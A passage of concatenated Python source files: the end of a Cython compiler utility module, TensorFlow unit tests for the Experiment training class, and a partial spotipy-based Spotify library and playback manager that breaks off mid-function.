res = cache.get(args, uncomputed)
if res is uncomputed:
res = cache[args] = f(*args)
return res
wrapper.uncached = f
return wrapper
def cached_method(f):
cache_name = '__%s_cache' % f.__name__
def wrapper(self, *args):
cache = getattr(self, cache_name, None)
if cache is None:
cache = {}
setattr(self, cache_name, cache)
if args in cache:
return cache[args]
res = cache[args] = f(self, *args)
return res
return wrapper
def replace_suffix(path, newsuf):
base, _ = os.path.splitext(path)
return base + newsuf
def open_new_file(path):
if os.path.exists(path):
# Make sure to create a new file here so we can
# safely hard link the output files.
os.unlink(path)
# we use the ISO-8859-1 encoding here because we only write pure
# ASCII strings or (e.g. for file names) byte encoded strings as
# Unicode, so we need a direct mapping from the first 256 Unicode
# characters to a byte sequence, which ISO-8859-1 provides
# note: can't use io.open() in Py2 as we may be writing str objects
return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
# Remove junk contents from an output file after a
# failed compilation.
# Also sets access and modification times back to
# those specified by st (a stat struct).
try:
f = open_new_file(path)
except EnvironmentError:
pass
else:
f.write(
"#error Do not use this file, it is the result of a failed Cython compilation.\n")
f.close()
if st:
os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
ftime = modification_time(path)
return ftime > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
include=False, sys_path=False):
# Search the list of include directories for the given
# file name. If a source file position is given, first
# searches the directory containing that file. Returns
# None if not found, but does not report an error.
# The 'include' option will disable package dereferencing.
# If 'sys_path' is True, also search sys.path.
if sys_path:
dirs = dirs + tuple(sys.path)
if pos:
file_desc = pos[0]
from Cython.Compiler.Scanning import FileSourceDescriptor
if not isinstance(file_desc, FileSourceDescriptor):
raise RuntimeError("Only file sources for code supported")
if include:
dirs = (os.path.dirname(file_desc.filename),) + dirs
else:
dirs = (find_root_package_dir(file_desc.filename),) + dirs
dotted_filename = qualified_name
if suffix:
dotted_filename += suffix
if not include:
names = qualified_name.split('.')
package_names = tuple(names[:-1])
module_name = names[-1]
module_filename = module_name + suffix
package_filename = "__init__" + suffix
for dir in dirs:
path = os.path.join(dir, dotted_filename)
if path_exists(path):
return path
if not include:
package_dir = check_package_dir(dir, package_names)
if package_dir is not None:
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
# Arcadia-specific lookup: search for packages in include paths,
# ignoring existence of __init__.py files as packages markers
# (they are not required by Arcadia build system)
if not include:
for dir in dirs:
package_dir = os.path.join(dir, *package_names)
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
return None
@cached_function
def find_root_package_dir(file_path):
dir = os.path.dirname(file_path)
if file_path == dir:
return dir
elif is_package_dir(dir):
return find_root_package_dir(dir)
else:
return dir
@cached_function
def check_package_dir(dir, package_names):
for dirname in package_names:
dir = os.path.join(dir, dirname)
if not is_package_dir(dir):
return None
return dir
@cached_function
def is_package_dir(dir_path):
for filename in ("__init__.py",
"__init__.pyc",
"__init__.pyx",
"__init__.pxd"):
path = os.path.join(dir_path, filename)
if path_exists(path):
return 1
@cached_function
def path_exists(path):
# try on the filesystem first
if os.path.exists(path):
return True
# figure out if a PEP 302 loader is around
try:
loader = __loader__
# XXX the code below assumes a 'zipimport.zipimporter' instance
# XXX should be easy to generalize, but too lazy right now to write it
archive_path = getattr(loader, 'archive', None)
if archive_path:
normpath = os.path.normpath(path)
if normpath.startswith(archive_path):
arcname = normpath[len(archive_path)+1:]
try:
loader.get_data(arcname)
return True
except IOError:
return False
except NameError:
pass
return False
# file name encodings
def decode_filename(filename):
if isinstance(filename, bytes):
try:
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding = sys.getdefaultencoding()
filename = filename.decode(filename_encoding)
except UnicodeDecodeError:
pass
return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
def detect_file_encoding(source_filename):
f = open_source_file(source_filename, encoding="UTF-8", error_handling='ignore')
try:
return detect_opened_file_encoding(f)
finally:
f.close()
def detect_opened_file_encoding(f):
# PEPs 263 and 3120
# Most of the time the first two lines fall in the first 250 chars,
# and this bulk read/split is much faster.
lines = f.read(250).split(u"\n")
if len(lines) > 1:
m = _match_file_encoding(lines[0])
if m:
return m.group(1)
elif len(lines) > 2:
m = _match_file_encoding(lines[1])
if m:
return m.group(1)
else:
return "UTF-8"
# Fallback to one-char-at-a-time detection.
f.seek(0)
chars = []
for i in range(2):
c = f.read(1)
while c and c != u'\n':
chars.append(c)
c = f.read(1)
encoding = _match_file_encoding(u''.join(chars))
if encoding:
return encoding.group(1)
return "UTF-8"
def skip_bom(f):
"""
Read past a BOM at the beginning of a source file.
This could be added to the scanner, but it's *substantially* easier
to keep it at this level.
"""
if f.read(1) != u'\uFEFF':
f.seek(0)
def open_source_file(source_filename, mode="r",
encoding=None, error_handling=None):
if encoding is None:
# Most of the time the coding is unspecified, so be optimistic that
# it's UTF-8.
f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
encoding = detect_opened_file_encoding(f)
if encoding == "UTF-8" and error_handling == 'ignore':
f.seek(0)
skip_bom(f)
return f
else:
f.close()
if not os.path.exists(source_filename):
try:
loader = __loader__
if source_filename.startswith(loader.archive):
return open_source_from_loader(
loader, source_filename,
encoding, error_handling)
except (NameError, AttributeError):
pass
stream = io.open(source_filename, mode=mode,
encoding=encoding, errors=error_handling)
skip_bom(stream)
return stream
def open_source_from_loader(loader,
source_filename,
encoding=None, error_handling=None):
nrmpath = os.path.normpath(source_filename)
arcname = nrmpath[len(loader.archive)+1:]
data = loader.get_data(arcname)
return io.TextIOWrapper(io.BytesIO(data),
encoding=encoding,
errors=error_handling)
def str_to_number(value):
# note: this expects a string as input that was accepted by the
# parser already, with an optional "-" sign in front
is_neg = False
if value[:1] == '-':
is_neg = True
value = value[1:]
if len(value) < 2:
value = int(value, 0)
elif value[0] == '0':
literal_type = value[1] # 0'o' - 0'b' - 0'x'
if literal_type in 'xX':
# hex notation ('0x1AF')
value = int(value[2:], 16)
elif literal_type in 'oO':
# Py3 octal notation ('0o136')
value = int(value[2:], 8)
elif literal_type in 'bB':
# Py3 binary notation ('0b101')
value = int(value[2:], 2)
else:
# Py2 octal notation ('0136')
value = int(value, 8)
else:
value = int(value, 0)
return -value if is_neg else value
def long_literal(value):
if isinstance(value, basestring):
value = str_to_number(value)
return not -2**31 <= value < 2**31
@cached_function
def get_cython_cache_dir():
"""get the cython cache dir
Priority:
1. CYTHON_CACHE_DIR
2. (OS X): ~/Library/Caches/Cython
(posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
3. ~/.cython
"""
if 'CYTHON_CACHE_DIR' in os.environ:
return os.environ['CYTHON_CACHE_DIR']
parent = None
if os.name == 'posix':
if sys.platform == 'darwin':
parent = os.path.expanduser('~/Library/Caches')
else:
# this could fallback on ~/.cache
parent = os.environ.get('XDG_CACHE_HOME')
if parent and os.path.isdir(parent):
return os.path.join(parent, 'cython')
# last fallback: ~/.cython
return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
pipe_in = t = None
orig_stream = os.dup(stream) # keep copy of original stream
try:
pipe_in, pipe_out = os.pipe()
os.dup2(pipe_out, stream) # replace stream by copy of pipe
try:
os.close(pipe_out) # close original pipe-out stream
data = []
def copy():
try:
while True:
d = os.read(pipe_in, 1000)
if d:
data.append(d)
else:
break
finally:
os.close(pipe_in)
def get_output():
output = b''.join(data)
if encoding:
output = output.decode(encoding)
return output
from threading import Thread
t = Thread(target=copy)
t.daemon = True # just in case
t.start()
yield get_output
finally:
os.dup2(orig_stream, stream) # restore original stream
if t is not None:
t.join()
finally:
os.close(orig_stream)
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
file.flush()
try:
out = file.buffer # Py3
except AttributeError:
out = file # Py2
out.write(s)
if end:
out.write(end)
if flush:
out.flush()
class LazyStr:
def __init__(self, callback):
self.callback = callback
def __str__(self):
return self.callback()
def __repr__(self):
return self.callback()
def __add__(self, right):
return self.callback() + right
def __radd__(self, left):
return left + self.callback()
# Class decorator that adds a metaclass and recreates the class with it.
# Copied from 'six'.
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
|
experiment_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import tempfile
import threading
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self.eval_hooks = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
if 'hooks' in kwargs:
self.eval_hooks = kwargs['hooks']
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, serving_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
(export_dir_base, serving_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class _NoopHook(session_run_hook.SessionRunHook):
pass
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEqual(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEqual(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEqual(0, est.fit_count)
self.assertEqual(1, est.eval_count)
self.assertEqual([noop_hook], est.eval_hooks)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input',
eval_hooks=[noop_hook])
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
self.assertEqual([noop_hook], est.eval_hooks)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEqual(0, est.fit_count)
self.assertEqual(6, est.eval_count)
self.assertEqual([noop_hook], est.eval_hooks)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.15)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
ex.continuous_eval(evaluate_checkpoint_only_once=False,
continuous_eval_predicate_fn=_predicate_fn)
self.assertEqual(0, est.fit_count)
self.assertEqual(3, est.eval_count)
self.assertEqual([noop_hook], est.eval_hooks)
def test_run_local(self):
est = TestEstimator()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEqual(1, est.fit_count)
self.assertEqual(1, est.eval_count)
self.assertEqual(1, len(est.monitors))
self.assertEqual([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_hooks_extend_does_not_mutate_input_hooks(self):
noop_hook = _NoopHook()
input_hooks = [noop_hook]
ex = experiment.Experiment(
TestEstimator(),
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_monitors=input_hooks)
self.assertAllEqual([noop_hook], ex._train_monitors)
another_noop_hook = _NoopHook()
# Assert that the extend API mutates the hooks, but not the input hooks
ex.extend_train_hooks([another_noop_hook])
self.assertAllEqual([noop_hook, another_noop_hook], ex._train_monitors)
self.assertAllEqual([noop_hook], input_hooks)
def test_export_strategies_reset(self):
est = TestEstimator()
export_strategy_1 = saved_model_export_utils.make_export_strategy(
est, 'export_input_1', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
export_strategies=[export_strategy_1])
ex.train_and_evaluate()
self.assertEqual(1, est.export_count)
# After reset with empty list (None), the count does not change and the user
# provided export strategy list should remain intact.
old_es = ex.reset_export_strategies()
ex.train_and_evaluate()
self.assertAllEqual([export_strategy_1], old_es)
self.assertEqual(1, est.export_count)
# After reset with list, the count should increase with the number of items.
export_strategy_2 = saved_model_export_utils.make_export_strategy(
est, 'export_input_2', exports_to_keep=None)
export_strategy_3 = saved_model_export_utils.make_export_strategy(
est, 'export_input_3', exports_to_keep=None)
old_es = ex.reset_export_strategies([export_strategy_2, export_strategy_3])
ex.train_and_evaluate()
self.assertAllEqual([], old_es)
self.assertEqual(3, est.export_count)
def test_train_and_evaluate(self):
est = TestEstimator()
noop_hook = _NoopHook()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEqual(1, est.fit_count)
self.assertEqual(1, est.eval_count)
self.assertEqual(1, est.export_count)
self.assertEqual(1, len(est.monitors))
self.assertEqual([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEqual(1, est.fit_count)
self.assertEqual(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEqual(1, count)
if __name__ == '__main__':
test.main()
|
spotify_manager.py
|
import spotipy
import datastore
from spotipy.oauth2 import SpotifyOAuth
import threading
import time
import json
class UserDevice():
__slots__ = ['id', 'name', 'is_active']
def __init__(self, id, name, is_active):
self.id = id
self.name = name
self.is_active = is_active
class UserTrack():
__slots__ = ['title', 'artist', 'album', 'uri']
def __init__(self, title, artist, album, uri):
self.title = title
self.artist = artist
self.album = album
self.uri = uri
def __str__(self):
return self.title + " - " + self.artist + " - " + self.album
class UserAlbum():
__slots__ = ['name', 'artist', 'track_count', 'uri']
def __init__(self, name, artist, track_count, uri):
self.name = name
self.artist = artist
self.uri = uri
self.track_count = track_count
def __str__(self):
return self.name + " - " + self.artist
class UserArtist():
__slots__ = ['name', 'uri']
def __init__(self, name, uri):
self.name = name
self.uri = uri
def __str__(self):
return self.name
class UserPlaylist():
__slots__ = ['name', 'idx', 'uri', 'track_count']
def __init__(self, name, idx, uri, track_count):
self.name = name
self.idx = idx
self.uri = uri
self.track_count = track_count
def __str__(self):
return self.name
class SearchResults():
__slots__ = ['tracks', 'artists', 'albums', 'album_track_map']
def __init__(self, tracks, artists, albums, album_track_map):
self.tracks = tracks
self.artists = artists
self.albums = albums
self.album_track_map = album_track_map
scope = "user-follow-read," \
"user-library-read," \
"user-library-modify," \
"user-modify-playback-state," \
"user-read-playback-state," \
"user-read-currently-playing," \
"app-remote-control," \
"playlist-read-private," \
"playlist-read-collaborative," \
"playlist-modify-public," \
"playlist-modify-private," \
"streaming"
DATASTORE = datastore.Datastore()
sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))
pageSize = 50
has_internet = False
def check_internet(request):
global has_internet
try:
result = request()
has_internet = True
except Exception as _:
print("no ints")
result = None
has_internet = False
return result
def get_playlist(id):
# TODO optimize query
results = sp.playlist(id)
tracks = []
for _, item in enumerate(results['tracks']['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
return (UserPlaylist(results['name'], 0, results['uri'], len(tracks)), tracks) # return playlist index as 0 because it won't have a idx parameter when fetching directly from Spotify (and we don't need it here anyway)
def get_album(id):
# TODO optimize query
results = sp.album(id)
album = results['name']
artist = results['artists'][0]['name']
tracks = []
for _, item in enumerate(results['tracks']['items']):
tracks.append(UserTrack(item['name'], artist, album, item['uri']))
return (UserAlbum(results['name'], artist, len(tracks), results['uri']), tracks)
def get_playlist_tracks(id):
tracks = []
results = sp.playlist_tracks(id, limit=pageSize)
while(results['next']):
for _, item in enumerate(results['items']):
track = item['track']
if track != None: # Catch case of empty playlist here
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
results = sp.next(results)
for _, item in enumerate(results['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
return tracks
def get_album_tracks(id):
tracks = []
results = sp.playlist_tracks(id, limit=pageSize)
while(results['next']):
for _, item in enumerate(results['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
results = sp.next(results)
for _, item in enumerate(results['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
return tracks
def refresh_devices():
results = sp.devices()
DATASTORE.clearDevices()
for _, item in enumerate(results['devices']):
if "Spotifypod" in item['name']:
print(item['name'])
device = UserDevice(item['id'], item['name'], item['is_active'])
DATASTORE.setUserDevice(device)
def parse_album(album):
artist = album['artists'][0]['name']
tracks = []
if 'tracks' not in album :
return get_album(album['id'])
for _, track in enumerate(album['tracks']['items']):
tracks.append(UserTrack(track['name'], artist, album['name'], track['uri']))
return (UserAlbum(album['name'], artist, len(tracks), album['uri']), tracks)
def refresh_data():
DATASTORE.clear()
results = sp.current_user_saved_tracks(limit=pageSize, offset=0)
while(results['next']):
offset = results['offset']
for idx, item in enumerate(results['items']):
track = item['track']
DATASTORE.setSavedTrack(idx + offset, UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
results = sp.next(results)
offset = results['offset']
for idx, item in enumerate(results['items']):
track = item['track']
DATASTORE.setSavedTrack(idx + offset, UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
print("Spotify tracks fetched")
offset = 0
results = sp.current_user_followed_artists(limit=pageSize)
while(results['artists']['next']):
for idx, item in enumerate(results['artists']['items']):
DATASTORE.setArtist(idx + offset, UserArtist(item['name'], item['uri']))
results = sp.next(results['artists'])
offset = offset + pageSize
for idx, item in enumerate(results['artists']['items']):
DATASTORE.setArtist(idx + offset, UserArtist(item['name'], item['uri']))
print("Spotify artists fetched: " + str(DATASTORE.getArtistCount()))
results = sp.current_user_playlists(limit=pageSize)
totalindex = 0 # variable to preserve playlist sort index when calling offset loop down below
while(results['next']):
offset = results['offset']
for idx, item in enumerate(results['items']):
tracks = get_playlist_tracks(item['id'])
DATASTORE.setPlaylist(UserPlaylist(item['name'], totalindex, item['uri'], len(tracks)), tracks, index=idx + offset)
totalindex = totalindex + 1
results = sp.next(results)
offset = results['offset']
for idx, item in enumerate(results['items']):
tracks = get_playlist_tracks(item['id'])
DATASTORE.setPlaylist(UserPlaylist(item['name'], totalindex, item['uri'], len(tracks)), tracks, index=idx + offset)
totalindex = totalindex + 1
print("Spotify playlists fetched: " + str(DATASTORE.getPlaylistCount()))
results = sp.current_user_saved_albums(limit=pageSize)
while(results['next']):
offset = results['offset']
for idx, item in enumerate(results['items']):
album, tracks = parse_album(item['album'])
DATASTORE.setAlbum(album, tracks, index=idx + offset)
results = sp.next(results)
offset = results['offset']
for idx, item in enumerate(results['items']):
album, tracks = parse_album(item['album'])
DATASTORE.setAlbum(album, tracks, index=idx + offset)
print("Refreshed user albums")
results = sp.new_releases(limit=pageSize)
for idx, item in enumerate(results['albums']['items']):
album, tracks = parse_album(item)
DATASTORE.setNewRelease(album, tracks, index=idx)
print("Refreshed new releases")
refresh_devices()
print("Refreshed devices")
def play_artist(artist_uri, device_id = None):
if (not device_id):
devices = DATASTORE.getAllSavedDevices()
if (len(devices) == 0):
print("error! no devices")
return
device_id = devices[0].id
response = sp.start_playback(device_id=device_id, context_uri=artist_uri)
refresh_now_playing()
print(response)
def play_track(track_uri, device_id = None):
if (not device_id):
devices = DATASTORE.getAllSavedDevices()
if (len(devices) == 0):
print("error! no devices")
return
device_id = devices[0].id
sp.start_playback(device_id=device_id, uris=[track_uri])
def play_from_playlist(playist_uri, track_uri, device_id = None):
print("playing ", playist_uri, track_uri)
if (not device_id):
devices = DATASTORE.getAllSavedDevices()
if (len(devices) == 0):
print("error! no devices")
return
device_id = devices[0].id
sp.start_playback(device_id=device_id, context_uri=playist_uri, offset={"uri": track_uri})
refresh_now_playing()
def get_now_playing():
response = check_internet(lambda: sp.current_playback())
if (not response or not response['item']):
return None
context = response['context']
track = response['item']
track_uri = track['uri']
artist = track['artists'][0]['name']
now_playing = {
'name': track['name'],
'track_uri': track_uri,
'artist': artist,
'album': track['album']['name'],
'duration': track['duration_ms'],
'is_playing': response['is_playing'],
'progress': response['progress_ms'],
'context_name': artist,
